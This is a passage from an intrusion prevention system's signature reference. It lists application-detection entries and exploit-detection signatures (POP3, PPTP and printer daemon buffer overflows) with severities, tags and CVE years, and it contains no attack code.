Vulnerability: Generic-Shared-Variables
Description:
Back to top

POP3_Server-Syntax-Error

About this situation: POP3 server reply could not be understood
Context: POP3 without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The POP3 server reply could not be parsed. This can be caused by a server that does not follow the POP3 protocol specification, or if the connection does not use POP3 at all. As such, this situation is probably not very severe. However, the rest of the data sent by the server in this connection may be inspected only partially, because the protocol state has been lost.
Back to top

POP3_SS-Curl-And-Libcurl-md5-Digest-Buffer-Overflow

About this situation: An attempt to exploit vulnerability in cURL Project cURL detected
Context: POP3 Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Curl-And-Libcurl-md5-Digest-Buffer-Overflow
Description:
Back to top

POP3_SS-Eureka-Email-2.2q-POP3-Buffer-Overflow

About this situation: An attempt to exploit a Eureka Email 2.2q POP3 Buffer Overflow vulnerability detected.
Context: POP3 Server Stream
Severity: 7
Tags: Windows XP SP3, Any Hardware, Eureka Email, CVE2009, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Eureka-Email-2.2q-POP3-Buffer-Overflow
Description:
Back to top

POP3_SS-Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook Express detected
Context: POP3 Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook Express, MS2010-05, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-304-4219
Vulnerability: Microsoft-Outlook-Express-And-Windows-Mail-Integer-Overflow
Description:
Back to top

POP3_SS-Small-AVI-Container

About this situation: Detects tiny RIFF-AVI video containers
Context: POP3 Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: Small-AVI-Container
Description:
Back to top

POP3_StartTLS

About this situation: StartTLS usage detected on POP
Context: POP3 Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-479-5211
Vulnerability: StartTLS-Usage
Description:
Back to top

POP3_Unknown-Command

About this situation: POP3 client used an unknown command
Context: POP3 without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: POP3 client used an unknown command. This may be a nonstandard extension of POP3, or it may be a signal that the connection does not use POP3 at all.
Back to top

POP3_User-Command-Buffer-Overflow

About this situation: Buffer overflow attempt in POP3 USER command
Context: POP3 Client Stream
Severity: 7
Tags: Windows, x86, Foxmail Server, CVE2005, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Foxmail-Server-User-Command-BOF
POP3-RevilloC-MailServer-Long-User-Command-Buffer-Overflow
POP3-Cyrus-IMAP-Server-POP3-User-Command-Buffer-Overflow
POP3-MDaemon-POP3-Server-User-And-Apop-Commands-Buffer-Overflow
Description:
Back to top

PopCap-Games

About this situation: PopCap Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Populi

About this situation: Application Populi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Populi is web-based college management software.
Back to top

Populr

About this situation: Application Populr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Populr allows create and track online pages to share information, grab attention, and get results.
Back to top

popurls.com

About this situation: Application popurls.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Popurls is single page that encapsulates up-to-the-minute headlines from the most popular sites on the internet
Back to top

Pornhub

About this situation: Pornhub-network usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1151-5242
Description: Pornhub is a network of adult video streaming services.
Back to top

Porntube

About this situation: Porntube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-628-5211
Description: Porntube is an adult video streaming service.
Back to top

PortalProdigy

About this situation: Application PortalProdigy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PortalProdigy is an eCommerce and content management with a product catalog, secure shopping cart and payment processing, order tracking, and much more.
Back to top

Portmap

About this situation: Portmap traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control, Application Routing
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description: Port mapper usage detected. Port mapper is an RPC service used for mapping RPC programs to network ports.
Back to top

POS

About this situation: Application POS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: POS in Cloud is source for tablet and mobile device business systems. Specialize in equipment and software for restaurants, retailers, boutiques and other businesses.
Back to top

Post-Affiliate-Pro

About this situation: Application Post-Affiliate-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Post Affiliate Pro is an affiliate software, trusted by companies worldwide.
Back to top

PostalMethods

About this situation: Application PostalMethods detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The PostalMethods web-to-postal API allow you integrate snail mail delivery into your application.
Back to top

Posteo

About this situation: Application Posteo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Posteo is an email provider that offers sustainable email accounts, address books and calendars.
Back to top

Posterous

About this situation: Posterous usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: Posterous is a simple blogging platform.
Back to top

PostgreSQL

About this situation: PostgreSQL traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1185-5242
Description: PostgreSQL is a popular open source relational database management system.
Back to top

PostgreSQL-SSL

About this situation: Encrypted PostgreSQL traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-759-5211
Description: PostgreSQL is a popular open source relational database management system. This application detects PostgreSQL traffic that uses SSL encryption.
Back to top

Postini

About this situation: Application Postini detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Postini Spam filtering provide variety of Postini MX Protection and Failover solutions.
Back to top

Postmark

About this situation: Postmark usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: Postmark is direct marketing expert, with full-service capabilities including printing, mailing, data enhancement, and fulfillment.
Back to top

PostRelease

About this situation: PostRelease usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: PostRelease is an advertising platform by Nativo.
Back to top

PostScan-Mail

About this situation: Application PostScan-Mail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Post Skan Mail provides mail forwarding, check deposit, skanning and mail management services to commercial and residential registered users
Back to top

Potentially Exploited Documents

About this situation: Documents containing content with suspicious characteristics that could lead to the exploitation of a machine.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Documents containing content with suspicious characteristics that could lead to the exploitation of a machine.
Back to top

Potentially Unwanted Software

About this situation: Sites using technologies that alter the operation of a user's hardware, software or network in ways that diminish control over the user experience, privacy or the collection and distribution of personal information.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites using technologies that alter the operation of a user's hardware, software or network in ways that diminish control over the user experience, privacy or the collection and distribution of personal information.
Back to top

Poupeegirl

About this situation: Poupeegirl usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: This site is a Japanese social networking service that allows users to play games and win virtual awards.
Back to top

Power-BI

About this situation: Application Power-BI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Microsoft Power BI transforms your data into rich visuals that you can organize any way you want, freeing you to focus on what matters most to you.
Back to top

PowerChute

About this situation: PowerChute traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Description: PowerChute is a software for managing safe shutdown in the event of a power problem.
Back to top

PowerFolder

About this situation: PowerFolder usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1238-5242
Description: PowerFolder allows users to synchronize, share and backup folders or files.
Back to top

Powernoodle

About this situation: Application Powernoodle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The cloud-based software that helps teams, groups, and organizations make better, smarter, faster decisions.
Back to top

PowerShell

About this situation: Endpoint Context Agent based PowerShell detection
Context: EI Correlation
Severity: 1
Tags: Framework, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-989-5242
Description: A network connection launched by the Windows system process PowerShell.EXE was detected. PowerShell is a powerful tool in Microsoft Windows which can be used for a large variety of tasks, including automation and configuration management.
Back to top

PowerShell_Gallery

About this situation: PowerShell Gallery usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1814-5242
Description: PowerShell gallery is central repository for sharing and acquiring PowerShell code.
Back to top

PowerVPS

About this situation: Application PowerVPS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PowerVPS is a provider for Website Hosting. Offering a choice of cPanel or Plesk, all powered by the Cloud.
Back to top

Powtoon

About this situation: Application Powtoon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PowToon is an online software tool that allows users to create animated video explainers and presentations.
Back to top

PPLive

About this situation: PPLive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-733-5211
Description: A Chinese peer-to-peer streaming video network; Source Wikipedia
Back to top

ppSD2-Membership-Software

About this situation: Application ppSD2-Membership-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ppSD2 is developer PHP solution which is installed directly on your server.The program allows you manage a customizable and
Back to top

PPStream

About this situation: PPStream traffic
Context: Application Context
Severity: 1
Tags: Protocols, Media
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: PPStream usage. PPStream is a Chinese p2p streaming video network software.
Back to top

PPTP

About this situation: PPTP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-764-5211
Description: PPTP a method for implementing virtual private networks. PPTP uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets.
Back to top

PPTP_Malformed-Start-Control-Request

About this situation: Buffer overflow in Microsoft's PPTP implementation
Context: TCP PPTP Client Stream
Severity: 7
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows XP SP1, Windows XP SP0, Any Hardware, MS2002, CVE2002, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: PPTP-Microsoft-Start-Control-Request-Buffer-Overflow
Description:
Back to top

PPTP_Microsoft-Windows-PPTP-Protocol-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP PPTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Microsoft-Windows-PPTP-Protocol-Denial-Of-Service
Description:
Back to top

PPTP_PoPToP-PPTP-Server-Negative-Read-BOF-1

About this situation: Attempt to exploit a buffer overflow in PoPToP PPTP Server
Context: TCP PPTP Client Stream
Severity: 10
Tags: Linux, x86, PoPToP PPTP Server, CVE2003, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: PoPToP-PPTP-Server-Negative-Read-BOF
Description:
Back to top

PPTP_PoPToP-PPTP-Server-Negative-Read-BOF-2

About this situation: Attempt to exploit a buffer overflow in PoPToP PPTP Server
Context: TCP PPTP Client Stream
Severity: 7
Tags: Linux, x86, PoPToP PPTP Server, CVE2003, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: PoPToP-PPTP-Server-Negative-Read-BOF
Description:
Back to top

PPTP_Windows-CVE-2022-23270

About this situation: Windows PPTP RCE CVE-2022-23270
Context: TCP PPTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-05, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1465-5242
Last changed: sgpkg-ips-1521-5242
Vulnerability: Microsoft-Windows-PPTP-CVE-2022-23270
Description:
Back to top

PPTP_Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows VPN component detected.
Context: TCP PPTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1497-5242
Vulnerability: Windows-Windows-PPTP-Protocol-CVE-2022-21972-Use-After-Free-Vulnerability
Description:
Back to top

PR-Newswire

About this situation: Application PR-Newswire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PR Newswires news distribution, targeting, monitoring and marketing solutions help you connect and engage with target audiences across the globe.
Back to top

Practical-Law

About this situation: Application Practical-Law detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Practical Law is a provider of online legal to law firms, law departments and law schools.
Back to top

Practice-Fusion

About this situation: Application Practice-Fusion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Practice Fusion provides web based electronic health record system and medical practice management technology to physicians.
Back to top

Practice-Pay-Solutions

About this situation: Application Practice-Pay-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Practice Pay Solutions is now DirectPay.DirectPay is service and support, providing secure credit card acceptance systems to a variety of industries, including professional coaching, speaking and online marketing.
Back to top

PracticePanther

About this situation: Application PracticePanther detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PracticePanther is an easy and secure law practice management software for lawyers worldwide.
Back to top

Practicesuite

About this situation: Application Practicesuite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PracticeSuite's passion is providing money saving revenue cycle management tools to Practice Administrators, Medical Billers, and RCM Companies --in tandem with our certified physician EHR available 32 medical specialties.
Back to top

PractiTest---Test-Management-Tool

About this situation: Application PractiTest---Test-Management-Tool detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PractiTest - SaaS Test Management Tool.
Back to top

Preact

About this situation: Application Preact detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Preact is a cloud-based, customer success system that helps subscription businesses maximize customer lifetime value by reducing churn and driving upgrades.
Back to top

Preactor

About this situation: Application Preactor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Preactor is an advanced planning and scheduling software used by a wide range of businesses across multiple industries. Preactor Advanced Planning and Scheduling
Back to top

Preceda

About this situation: Application Preceda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ascender Preceda is a unified solution for paying people, managing core HR needs and delivering fast, accurate and efficient payroll and HR solutions.
Back to top

Precis

About this situation: Application Precis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Precis is an integrated suite of web applications for ecommerce, web content management, online marketing, and sales force automation.
Back to top

PrecisionPoint

About this situation: Application PrecisionPoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PrecisionPoint delivers turnkey 3D scanning services and reality capture solutions for actionable data that empowers AECO professionals to reliably document, design, and build.
Back to top

Prefinery

About this situation: Application Prefinery detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prefinery is a complete launch platform for your web or mobile application beta.
Back to top

Presagia

About this situation: Application Presagia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Presagia's cloud-based absence management system provides decision support and automates leave processes to increase efficiency, minimize absence, reduce cost and above all improve compliance.
Back to top

Prescribed Medications

About this situation: Sites that provide information about approved drugs and their medical use.
Context: URL Application Context
Severity: 1
Tags: Drugs, Productivity Loss, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about approved drugs and their medical use.
Back to top

PresenterMedia

About this situation: Application PresenterMedia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PresenterMedia is design service for Microsoft PowerPoint presentations. Popular subscription service allows our clients to download customizable PowerPoint templates, animations, premium 3D imagery and clipart for their presentations.
Back to top

Pressable

About this situation: Application Pressable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pressable is reliable WordPress hosting for businesses and developers.
Back to top

Pressdoc

About this situation: pressdoc usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: PressDoc, a service for assisting companies with their public relations needs, has re-launched as Pr.co. Pr.co offers custom press rooms for companies and helps with the creation of visually attractive press releases
Back to top

Pressking

About this situation: Pressking usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Pressking gives simple and intuitive interface for creating and configuring press room for users.
Back to top

Prezi

About this situation: Prezi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: This software is a presentation tool that helps organize and share ideas, with a storytelling tool for presenting on a virtual canvas. Source: Wikipedia
Back to top

Prezly

About this situation: Application Prezly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prezly is a PR software that helps brands do corporate communications. Newsrooms and social media press releases with THE CRM for PR.
Back to top

Priceline

About this situation: Priceline usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Priceline helps users to obtain discount rates for travel-related purchases such as airline tickets and hotel stays.
Back to top

PriceManager

About this situation: Application PriceManager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PriceManager is a software service company that helps retailers, manufacturers, and other interested parties track online pricing.
Back to top

Primadesk

About this situation: Primadesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Primadesk helps you search, explore, edit, manage and share all your online content in one place. This is your personal cloud file explorer, file manager, file search system all rolled into one. This also functions as the cloud storage client. The web version also functions as an application manager.
Back to top

Primalogik-360

About this situation: Application Primalogik-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Primalogik 360 is a cloud-based employee performance management solution. It helps companies replace paper-based processes with a appraisal process online.
Back to top

Primark

About this situation: Application Primark detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Primark is an Irish clothing retailer
Back to top

PrimaticsFinancial

About this situation: Application PrimaticsFinancial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PrimaticsFinancial is the provider of financial services solutions that enable customers to process, model and analyze loan portfolios, comply with accounting and regulatory requirements and grow businesses.
Back to top

Prime-MRM

About this situation: Application Prime-MRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prime MRM - internet based Member Relationship Management Solution.
Back to top

Prime-Technologies

About this situation: Application Prime-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prime Technologies provides quality management products and services to industries.
Back to top

Printer_CS-HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability

About this situation: An attempt to exploit a vulnerability in HP-UX Remote Line Printer Daemon detected
Context: TCP Printer Client Stream
Severity: 7
Tags: HP-UX, Any Hardware, lpd, CVE2001, HP-UX not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability
Description:
Back to top

Printer_CS-Hummingbird-Inetd-Lpd-Component-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Hummingbird InetD detected
Context: TCP Printer Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Hummingbird Connectivity, CVE2005, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Hummingbird-Inetd-Lpd-Component-Buffer-Overflow
Description:
Back to top

Printer_CS-SAPlpd-Multiple-Command-Buffer-Overflow

About this situation: Detects buffer overflow attacks against SAPlpd
Context: TCP Printer Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAPlpd, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-267-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: LPD-SAPlpd-Multiple-Commands-Buffer-Overflow
Description:
Back to top

Printer_CS-Sun-Solaris-Lpd-Remote-Command-Execution

About this situation: Detects attempts to execute arbitrary commands via old versions of Solaris LPD
Context: TCP Printer Client Stream
Severity: 7
Tags: Solaris, Any Hardware, CVE2001, Solaris not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-343-4219
Vulnerability: Sun-Solaris-Lpd-Remote-Command-Execution
Description:
Back to top

Printer_HP-UX-LPD-Buffer-Overflow

About this situation: Attempt to exploit an HP-UX LPD Buffer Overflow vulnerability detected.
Context: TCP Printer Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, lpd, CVE2002, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Vulnerability: HP-UX-LPD-Buffer-Overflow
Description:
Back to top

Printer_Lpd-Sendmail-System-Compromise

About this situation: System compromise attempt via Solaris lpd
Context: TCP Printer Client Stream
Severity: 10
Tags: Solaris, Any Hardware, lpd, CVE2000, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Lpd-Sendmail-System-Compromise
Description:
Back to top

Printer_Lpr-Format-String-Attack

About this situation: Attempt to exploit a format string attack detected
Context: TCP Printer Client Stream
Severity: 7
Tags: Unix, x86, CVE2000, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Lprng-Format-String-Vulnerability
Description:
Back to top

Printer_NIPrint-Lpd-Lpr-Server-BOF-1

About this situation: Attempt to exploit a buffer overflow in NIPrint LPD-LPR server
Context: TCP Printer Client Stream
Severity: 10
Tags: Windows, x86, Network Instruments NIPrint LPD-LPR Print Server, CVE2003, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: NIPrint-Lpd-Lpr-Server-BOF
Description:
Back to top

Printer_NIPrint-Lpd-Lpr-Server-BOF-2

About this situation: Attempt to exploit a buffer overflow in NIPrint LPD-LPR server
Context: TCP Printer Client Stream
Severity: 10
Tags: Windows, x86, Network Instruments NIPrint LPD-LPR Print Server, CVE2003, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: NIPrint-Lpd-Lpr-Server-BOF
Description:
Back to top

Printer_NIPrint-Lpd-Lpr-Server-BOF-3

